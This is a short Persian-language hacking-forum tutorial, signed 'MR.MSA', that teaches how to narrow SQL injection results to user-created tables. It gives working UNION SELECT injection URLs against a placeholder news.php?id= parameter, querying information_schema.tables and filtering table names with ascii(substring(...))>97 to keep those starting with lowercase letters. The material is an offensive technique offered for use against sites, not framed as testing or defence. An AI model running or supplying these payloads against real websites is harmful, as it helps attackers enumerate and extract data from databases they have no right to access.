روش حرفه ای محدود سازی تیبل ها

[MR.MSA]

با سلام خدمت کاربران و مدیران عزیز گارد ایران  

 

 توضیح مختصر در رابطه با جداول (table) 

تیبل های سیستمی : 

 

تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . 

 

تیبل های user یا کاربری  : 

 

تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند .   

 

 

ما قبلا برای محدود سازی از این روش استفاده می کردیم :  

Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()--

 

 

و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود :

 

Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97--

 

و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. 

 

برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : 

 

 Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- 

 

نکته : 

در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . 

امیدوارم لذت برده باشید تشکر فراموش نشه